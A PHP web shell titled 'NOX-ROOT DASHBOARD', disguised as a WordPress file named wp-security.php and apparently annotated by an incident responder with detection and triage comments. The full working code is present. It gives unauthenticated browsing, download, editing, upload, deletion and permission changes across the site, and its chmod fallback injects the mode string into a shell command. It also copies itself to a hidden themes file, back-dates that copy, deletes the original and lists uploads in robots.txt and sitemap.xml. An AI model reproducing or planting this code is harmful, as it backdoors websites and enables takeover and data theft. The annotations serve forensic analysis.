File: /medikors/www/wp-security.php
<?php
// Turns off error reporting and on-page error display, then starts output buffering.
@error_reporting(0);@ini_set('display_errors',0);@ob_start();
// Defines the WordPress constants ABSPATH (set to the document root) and WPINC when absent.
// NOTE(review): no WordPress file is loaded anywhere in this script; presumably the constants
// only make it look like, or coexist with, WordPress code — confirm against the host's install.
if(!defined('ABSPATH'))define('ABSPATH',$_SERVER['DOCUMENT_ROOT'].'/');
if(!defined('WPINC'))define('WPINC','wp-includes');
// Attempts to clear disable_functions and open_basedir at runtime. disable_functions is a
// php.ini-only directive and open_basedir can only be tightened via ini_set, so on a stock
// PHP build both calls should have no effect; the pair is still a strong static signature.
@ini_set('disable_functions','');@ini_set('open_basedir',NULL);
// Strips every ".php"/".phtml" occurrence from the in-process copy of REQUEST_URI.
// This only changes what later PHP code sees; the web server's own access log is written
// outside this script and is not touched by this line.
$_SERVER['REQUEST_URI']=preg_replace('/\.(php|phtml)/i','',$_SERVER['REQUEST_URI']??'');
// Marks the request as a WordPress cron/AJAX, non-admin request via a GET flag and constants.
// NOTE(review): likely aimed at code that skips checks for cron/AJAX traffic — unverified here.
$_GET['doing_wp_cron']=1;
if(!defined('WP_ADMIN'))define('WP_ADMIN',false);
if(!defined('DOING_CRON'))define('DOING_CRON',true);
if(!defined('DOING_AJAX'))define('DOING_AJAX',true);
// gn(): derives the file name used for the relocated copy of this script.
// The name is deterministic per host string: HASH8 is the first 8 hex chars of
// md5(host . 'nox24'), and the first byte of md5(host) selects one of four theme-like names
// (functions-HASH8.php, template-HASH8.php, header-custom-HASH8.php, footer-custom-HASH8.php).
// Host comes from HTTP_HOST (taken from the request), then SERVER_NAME, then 'default', so a
// site reached under several host names can end up with several differently named copies.
// Hunting: recompute the name for each served host name, or search for the four name patterns.
function gn(){$d=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'default';$h=substr(md5($d.'nox24'),0,8);
$n=['functions-'.$h.'.php','template-'.$h.'.php','header-custom-'.$h.'.php','footer-custom-'.$h.'.php'];
return $n[hexdec(substr(md5($d),0,2))%count($n)];}
// st($f): if $f exists, sets its modification and access times to two years before now.
// mtime/atime are therefore not trustworthy for files this script has touched. touch() takes
// only those two timestamps, so on POSIX filesystems the inode change time (ctime) remains a
// usable pivot for timeline work.
function st($f){if(@file_exists($f))@touch($f,strtotime("-2 years"),strtotime("-2 years"));}
// $bd: base directory = resolved DOCUMENT_ROOT, falling back to this script's directory.
$bd=$_SERVER['DOCUMENT_ROOT']??__DIR__;$bd=realpath($bd)?:$bd;
// $cp: directory to browse, taken from the "p" query parameter and reset to $bd when it does
// not start with $bd. The test is a plain string-prefix match, not a path-component match, so
// a sibling directory whose path merely begins with the docroot string also passes; include
// such siblings when scoping what this script could read or modify.
$cp=$_GET['p']??$bd;$cp=realpath($cp)?:$cp;if(strpos($cp,$bd)!==0)$cp=$bd;
// POST action dispatcher. Any request carrying a POST field "a" is handled here and answered
// with JSON {"s":bool,"m":string}. No authentication, token or origin check precedes it in this
// file, so anyone who knows the URL can use it. Each handler repeats the string-prefix test
// against $bd.
// Log hunting: POSTs to this script with field a = d | c | r | ch | u.
if(isset($_POST['a'])){header('Content-Type:application/json');$a=$_POST['a'];$r=['s'=>false,'m'=>''];
switch($a){
// a=d: delete the file or (empty) directory at "p"; the base directory itself is excluded.
case 'd':$p=realpath($_POST['p']??'')?:'';if($p&&strpos($p,$bd)===0&&$p!==$bd){
$r['s']=is_file($p)?@unlink($p):@rmdir($p);$r['m']=$r['s']?'OK':'Fail';}break;
// a=c: inside directory "p", create file "n" with body "c" (t=f) or directory "n" (any other t).
// "n" is reduced to its basename, so the new entry lands directly in "p".
case 'c':$pp=realpath($_POST['p']??'')?:'';$n=basename($_POST['n']??'');$t=$_POST['t']??'f';$c=$_POST['c']??'';
if($pp&&strpos($pp,$bd)===0&&is_dir($pp)&&$n){$tg=$pp.'/'.$n;
$r['s']=($t==='f')?(@file_put_contents($tg,$c)!==false):@mkdir($tg,0755,true);$r['m']=$r['s']?'OK':'Fail';}break;
// a=r: rename "o" to basename "n" within the same directory.
case 'r':$op=realpath($_POST['o']??'')?:'';$nn=basename($_POST['n']??'');
if($op&&strpos($op,$bd)===0&&$nn){$r['s']=@rename($op,dirname($op).'/'.$nn);$r['m']=$r['s']?'OK':'Fail';}break;
// a=ch: change permissions of "p" to octal mode "m", first with chmod(), then by shelling out.
case 'ch':$p=realpath($_POST['p']??'')?:'';$m=$_POST['m']??'';
if($p&&strpos($p,$bd)===0&&$m){
$om=octdec($m);$r['s']=@chmod($p,$om);
// Fallbacks run the system chmod. Only the path goes through escapeshellarg(); the mode string
// is placed in the command line as received. Where exec/shell_exec are enabled, treat this
// script as giving OS command execution, not just file management, when scoping the incident.
if(!$r['s']&&function_exists('exec')){@exec("chmod $m ".escapeshellarg($p),$o,$ret);$r['s']=($ret===0);}
// The shell_exec fallback reports success without checking the result.
if(!$r['s']&&function_exists('shell_exec')){@shell_exec("chmod $m ".escapeshellarg($p));$r['s']=true;}
$r['m']=$r['s']?'Permissions changed':'Failed (server restriction)';}break;
// a=u: upload. "d" is base64 file content, written to directory "p" under basename "n".
case 'u':$up=realpath($_POST['p']??'')?:'';$fn=basename($_POST['n']??'');$b=$_POST['d']??'';
if($up&&strpos($up,$bd)===0&&is_dir($up)&&$fn&&$b){$ct=@base64_decode($b);
if($ct!==false){$fp=$up.'/'.$fn;$r['s']=@file_put_contents($fp,$ct)!==false;
if($r['s']){@chmod($fp,0644);
// After a successful upload the script advertises the file to crawlers: it appends
// "Allow: /NAME" to robots.txt in the base directory (creating the file if absent) ...
$rb=$bd.'/robots.txt';$rc=@file_exists($rb)?@file_get_contents($rb):'';
if(strpos($rc,'Allow: /'.$fn)===false){$rc.="\nAllow: /".$fn."\n";@file_put_contents($rb,$rc);}
// ... and inserts a url entry into sitemap.xml (created from an empty urlset if absent) with
// today's date as lastmod, changefreq daily and priority 0.8. The URL is always built as
// scheme://host/NAME, whatever directory the file was uploaded to.
// Triage: diff robots.txt and sitemap.xml against a known-good copy; added Allow lines and url
// entries enumerate the names of files uploaded through this script.
$sm=$bd.'/sitemap.xml';$sc=@file_exists($sm)?@file_get_contents($sm):'<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"></urlset>';
$dm=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'localhost';
$pr=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://';
$url=$pr.$dm.'/'.$fn;
if(strpos($sc,$url)===false){$nu='<url><loc>'.$url.'</loc><lastmod>'.date('Y-m-d').'</lastmod><changefreq>daily</changefreq><priority>0.8</priority></url>';
$sc=str_replace('</urlset>',$nu.'</urlset>',$sc);@file_put_contents($sm,$sc);}
}$r['m']=$r['s']?'OK':'Fail';}}break;
// Unknown actions fall through with s=false; the JSON reply is sent and the script stops.
}echo json_encode($r);exit;}
// $m holds the status banner shown after a save; empty means no banner.
$m='';
// GET dl + p: streams the file at "p" to the client as an attachment (data exfiltration path).
// Log hunting: GET requests to this script with both "dl" and "p" in the query string.
if(isset($_GET['dl'],$_GET['p'])){$dp=realpath($_GET['p'])?:$_GET['p'];
if(strpos($dp,$bd)===0&&is_file($dp)){header('Content-Type:application/octet-stream');
header('Content-Disposition:attachment;filename="'.basename($dp).'"');readfile($dp);exit;}}
// POST ep + ec: overwrites the existing file "ep" with the body "ec" (in-place edit of any file
// under the base directory that the PHP process user can write).
if(isset($_POST['ep'],$_POST['ec'])){$ep=realpath($_POST['ep'])?:$_POST['ep'];
if(strpos($ep,$bd)===0&&is_file($ep))$m=@file_put_contents($ep,$_POST['ec'])?'<g>✓ Saved</g>':'<r>✗ Failed</r>';}
// GET e + p: loads the file at "p" into $fc for the editor form; $ef records which file is open.
$fc='';$ef='';
if(isset($_GET['e'],$_GET['p'])){$ep=realpath($_GET['p'])?:$_GET['p'];
if(strpos($ep,$bd)===0&&is_file($ep)){$fc=@file_get_contents($ep);$ef=$ep;}}
// sd($d): lists directory $d for the file table.
// Returns one array per entry with keys n (name), p (full path), t ('d' or 'f'), s (size in
// bytes, 0 for non-files), pm (last four octal digits of the mode) and m (mtime as 'm-d H:i').
// Entries whose name starts with a dot are skipped, so dotfiles never appear in the listing.
function sd($d){$it=[];if(is_dir($d)){$fs=@scandir($d);if($fs){foreach($fs as $f){
if($f==='.'||$f==='..'||$f[0]==='.')continue;$p=$d.'/'.$f;
$it[]=['n'=>$f,'p'=>$p,'t'=>is_dir($p)?'d':'f','s'=>is_file($p)?filesize($p):0,
'pm'=>substr(sprintf('%o',fileperms($p)),-4),'m'=>date('m-d H:i',filemtime($p))];}}}return $it;}
// Self-relocation. Runs on every page load that is not a POST action or a download.
// $hn = per-host hidden name from gn(); $cf = path this script is running from.
$hn=gn();$cf=__FILE__;$cn=basename($cf);
// WordPress is assumed when wp-config.php or wp-content exists in the base directory.
$iw=@file_exists($bd.'/wp-config.php')||@file_exists($bd.'/wp-content');
// WordPress case: the target is wp-content/themes/NAME, directly in the themes directory rather
// than inside a theme folder (the directory is created if missing). $ih ("already hidden") is
// true whenever this script runs from any path containing /wp-content/themes/.
if($iw){$hd=$bd.'/wp-content/themes';if(!is_dir($hd))@mkdir($hd,0755,true);
$hf=$hd.'/'.$hn;$ih=(strpos($cf,'/wp-content/themes/')!==false);
// Non-WordPress case: the target is NAME in the base directory. gn() never returns a name that
// starts with a dot, so this $ih test cannot be true and the branch below is re-evaluated on
// each request.
$hu='/wp-content/themes/'.$hn;}else{$hd=$bd;$hf=$hd.'/'.$hn;
$ih=($cn[0]==='.'&&$cf===$hf);$hu='/'.$hn;}
// When not yet relocated and no copy exists: copy this file's contents to the target ...
if(!$ih){if(!@file_exists($hf)){$cc=@file_get_contents($cf);
if($cc!==false&&@is_writable($hd)){$cr=@file_put_contents($hf,$cc);
// ... back-date the copy by two years via st(), then delete the file that was originally
// requested. The path first seen in access logs may therefore no longer exist on disk.
if($cr!==false){st($hf);if(@file_exists($hf)&&$cf!==$hf)@unlink($cf);
// Sets mode 0755 on these four files in the base directory when they exist. Compare their
// current permissions with the site's baseline during cleanup.
$fa=['.htaccess','index.php','wp-config.php','wp-load.php'];
foreach($fa as $fn){$fp=$bd.'/'.$fn;if(@file_exists($fp))@chmod($fp,0755);}
}}}
// A copy already exists at the target: just remove the currently running file if it is a
// different path.
else{if($cf!==$hf&&@file_exists($cf))@unlink($cf);}}
// Directory listing for the page render.
$it=sd($cp);
// fs($b): formats a byte count for display as 'NB', 'N.nK' (1024-based) or 'N.nM'.
function fs($b){if($b<1024)return $b.'B';if($b<1048576)return round($b/1024,1).'K';return round($b/1048576,1).'M';}
// Host fingerprint shown in the page header: PHP version, OS name and the script owner's user
// name. The page title and banner text "NOX-ROOT DASHBOARD" below are usable content signatures
// for scanning web roots and response bodies.
$pv=phpversion();$os=php_uname('s');$u=get_current_user()?:'unknown';
?><!DOCTYPE html><html><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title>NOX-ROOT DASHBOARD</title>
<style>*{margin:0;padding:0;box-sizing:border-box}body{background:#000;color:#ccc;padding:10px;font:13px Arial}
.c{background:#111;border:1px solid #333;max-width:1400px;margin:0 auto;border-radius:5px;overflow:hidden}
.h{background:#1a1a1a;padding:12px;border-bottom:1px solid #333;display:flex;justify-content:space-between;align-items:center;flex-wrap:wrap;gap:8px}
.h b{color:#fff;font-size:18px}.h small{color:#666;font-size:11px}
.nav{background:#0d0d0d;padding:8px 12px;border-bottom:1px solid #222;display:flex;flex-wrap:wrap;gap:4px}
.nav a{color:#999;text-decoration:none;padding:4px 8px;background:#1a1a1a;border-radius:3px;font-size:12px}.nav a:hover{background:#222;color:#fff}
.tb{padding:8px 12px;background:#0d0d0d;border-bottom:1px solid #222;display:flex;gap:6px;flex-wrap:wrap}
.bt{background:#1a1a1a;color:#999;border:1px solid #333;padding:6px 12px;cursor:pointer;border-radius:3px;font-size:12px;text-decoration:none;display:inline-flex;align-items:center;gap:4px}
.bt:hover{background:#222;border-color:#666;color:#fff}
g{color:#6f6}r{color:#f66}.msg{padding:8px;background:#0d0d0d;border-bottom:1px solid #222;text-align:center;font-weight:700}
table{width:100%;border-collapse:collapse}th{background:#1a1a1a;padding:8px 12px;text-align:left;border-bottom:1px solid #333;color:#888;font-size:12px}
td{padding:7px 12px;border-bottom:1px solid #1a1a1a;font-size:13px}tr:hover{background:#0d0d0d}
a.f{color:#aaa;text-decoration:none;font-weight:700}a.f:hover,a.l:hover{color:#fff}a.l{color:#888;text-decoration:none}
.pm{font-family:monospace;color:#888;background:#1a1a1a;padding:2px 6px;border-radius:3px;font-size:11px}
.ab{padding:3px 8px;background:#1a1a1a;color:#888;border:1px solid #333;font-size:11px;cursor:pointer;text-decoration:none;border-radius:3px;display:inline-block}
.ab:hover{background:#222;border-color:#666;color:#fff}.ar{color:#f66}
textarea{width:100%;height:350px;background:#000;color:#ccc;border:1px solid #333;padding:12px;font:13px monospace;border-radius:3px}
input[type=text]{background:#000;color:#fff;border:1px solid #333;padding:6px;border-radius:3px}
.si{background:#000;border:1px solid #333;color:#fff;padding:6px 12px;border-radius:3px;font-size:13px;width:200px;margin-left:auto}
.si:focus{outline:0;border-color:#666}
.toast{position:fixed;top:20px;right:20px;background:#1a1a1a;border:1px solid #333;padding:12px 20px;border-radius:5px;color:#fff;font-size:13px;z-index:9999;animation:slideIn 0.3s}
.toast.success{border-left:4px solid #6f6}.toast.error{border-left:4px solid #f66}
@keyframes slideIn{from{transform:translateX(100%);opacity:0}to{transform:translateX(0);opacity:1}}
</style></head><body><div class=c>
<div class=h><div><b>NOX-ROOT DASHBOARD</b> <small>PHP:<?=$pv?> | <?=$os?> | <?=$u?></small>
<?php if(!$ih):$pr=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://';
// When not running from the relocated path, the header shows the operator a link to the hidden
// copy: scheme + request host + $hu (the relocated file's URL path computed above).
$dm=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'localhost';$hurl=$pr.$dm.$hu;?>
<a href="<?=htmlspecialchars($hurl)?>" target=_blank style="color:#888;text-decoration:none;font-size:11px">🔒 <?=htmlspecialchars($hurl)?></a>
<?php endif;?></div></div>
<?php if($m):?><div class=msg><?=$m?></div><?php endif;?>
<div class=nav><a href="?p=<?=urlencode($bd)?>">Root</a><?php $pp=explode('/',trim(str_replace($bd,'',$cp),'/'));$cb=$bd;
foreach($pp as $pt)if($pt){$cb.='/'.$pt;?><span style="color:#666">/</span><a href="?p=<?=urlencode($cb)?>"><?=htmlspecialchars($pt)?></a><?php }?></div>
<div class=tb>
<button class=bt onclick="document.getElementById('uf').click()">📤 Upload</button>
<input type=file id=uf style="display:none" onchange="uf(this)">
<button class=bt onclick="nf()">📝 File</button><button class=bt onclick="nd()">📁 Folder</button>
<?php if($ef):?><a href="?p=<?=urlencode($cp)?>" class=bt style="color:#f66">✗ Close</a><?php endif;?>
<input type=text id=si class=si placeholder="🔍 Search..." onkeyup="sf(this.value)"></div>
<?php if($ef):?>
<div style="padding:15px"><div style="color:#ccc;margin-bottom:10px">Editing: <?=htmlspecialchars(basename($ef))?></div>
<form method=post><input type=hidden name=ep value="<?=htmlspecialchars($ef)?>">
<textarea name=ec><?=htmlspecialchars($fc)?></textarea>
<div style="margin-top:10px;display:flex;gap:6px"><button class=bt style="color:#6f6">Save</button>
<a href="?p=<?=urlencode($cp)?>" class=bt style="color:#f66">Cancel</a></div></form></div>
<?php else:?>
<table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Modified</th><th>Actions</th></tr>
<tbody id=fl>
<?php if($cp!==$bd):?><tr><td colspan=5><a href="?p=<?=urlencode(dirname($cp))?>" class=f>📂 ..</a></td></tr><?php endif;?>
<?php $fo=array_filter($it,fn($i)=>$i['t']==='d');$fi=array_filter($it,fn($i)=>$i['t']==='f');
foreach($fo as $d):?>
<tr data-n="<?=htmlspecialchars(strtolower($d['n']))?>">
<td><a href="?p=<?=urlencode($d['p'])?>" class=f>📁 <?=htmlspecialchars($d['n'])?></a></td><td>-</td>
<td><span class=pm><?=$d['pm']?></span></td><td><?=$d['m']?></td>
<td><button onclick="rn('<?=htmlspecialchars($d['p'])?>','<?=htmlspecialchars($d['n'])?>')" class=ab>Ren</button>
<button onclick="ch('<?=htmlspecialchars($d['p'])?>','<?=$d['pm']?>')" class=ab>Chm</button>
<button onclick="dl('<?=htmlspecialchars($d['p'])?>')" class="ab ar">Del</button></td></tr>
<?php endforeach;foreach($fi as $f):?>
<tr data-n="<?=htmlspecialchars(strtolower($f['n']))?>">
<td><a href="?p=<?=urlencode($cp)?>&e=1&p=<?=urlencode($f['p'])?>" class=l>📄 <?=htmlspecialchars($f['n'])?></a></td>
<td style="color:#888"><?=fs($f['s'])?></td><td><span class=pm><?=$f['pm']?></span></td><td><?=$f['m']?></td>
<td><a href="?p=<?=urlencode($cp)?>&e=1&p=<?=urlencode($f['p'])?>" class=ab>Edit</a>
<a href="?dl=1&p=<?=urlencode($f['p'])?>" class=ab>DL</a>
<button onclick="rn('<?=htmlspecialchars($f['p'])?>','<?=htmlspecialchars($f['n'])?>')" class=ab>Ren</button>
<button onclick="ch('<?=htmlspecialchars($f['p'])?>','<?=$f['pm']?>')" class=ab>Chm</button>
<button onclick="dl('<?=htmlspecialchars($f['p'])?>')" class="ab ar">Del</button></td></tr>
<?php endforeach;if(empty($it)):?><tr><td colspan=5 style="text-align:center;padding:30px;color:#666">Empty</td></tr><?php endif;?>
</tbody></table><?php endif;?></div>
<script>
// cp: current directory as rendered by the server; sent back as field "p" by the create and
// upload helpers below.
const cp='<?=htmlspecialchars($cp)?>';
// toast(m,t): shows a transient status message for three seconds.
function toast(m,t){const d=document.createElement('div');d.className='toast '+(t||'success');d.textContent=m;
document.body.appendChild(d);setTimeout(()=>d.remove(),3000);}
// aj(a,d): sends action code "a" plus the fields in d as a FormData POST to this page's own path
// and parses the JSON reply. On the wire these are multipart form posts to the script URL with a
// field named "a", which is the pattern to look for in request captures and WAF logs.
function aj(a,d){const f=new FormData();f.append('a',a);for(const k in d)f.append(k,d[k]);
return fetch(location.pathname,{method:'POST',body:f}).then(r=>r.json());}
// Client-side wrappers, one per server action code.
// dl(p): a=d, delete the entry at path p after a confirm prompt.
function dl(p){if(!confirm('Delete?'))return;const r=event.target.closest('tr');r.style.opacity='0.5';
aj('d',{p}).then(x=>{if(x.s){r.remove();toast('Deleted','success');}else{r.style.opacity='1';toast(x.m||'Failed','error');}});}
// nf(): a=c with t=f, create a file in cp with prompted name and content.
function nf(){const n=prompt('File:','new.txt');if(n){const c=prompt('Content:','');
aj('c',{p:cp,n,t:'f',c:c||''}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});}}
// nd(): a=c with t=d, create a directory in cp.
function nd(){const n=prompt('Folder:','new');if(n)aj('c',{p:cp,n,t:'d'}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});}
// rn(o,n): a=r, rename path o to a prompted new name.
function rn(o,n){const nn=prompt('New:',n);if(nn&&nn!==n)aj('r',{o,n:nn}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});}
// ch(p,c): a=ch, change the mode of path p to a prompted value (c is the current mode).
function ch(p,c){const m=prompt('Perm:',c);if(m&&m!==c)aj('ch',{p,m}).then(x=>{if(x.s){toast(x.m||'Changed','success');setTimeout(()=>location.reload(),800);}else toast(x.m||'Failed','error');});}
// uf(i): a=u, read the chosen file as a data URL and send its base64 part as field "d" with the
// original file name as "n". Uploads therefore appear as a base64 text field in the POST body,
// not as a file part.
function uf(i){const f=i.files[0];if(!f)return;toast('Uploading: '+f.name,'success');const r=new FileReader();r.onload=function(e){
const b=e.target.result.split(',')[1];aj('u',{p:cp,n:f.name,d:b}).then(x=>{if(x.s){toast('Uploaded: '+f.name,'success');setTimeout(()=>location.reload(),800);}else toast(x.m||'Failed','error');});};
r.readAsDataURL(f);i.value='';}
// sf(q): client-side filter of the listing rows by lower-cased name; makes no request.
function sf(q){q=q.toLowerCase();document.querySelectorAll('#fl tr[data-n]').forEach(r=>{
r.style.display=r.dataset.n.includes(q)?'':'none';});}
</script></body></html>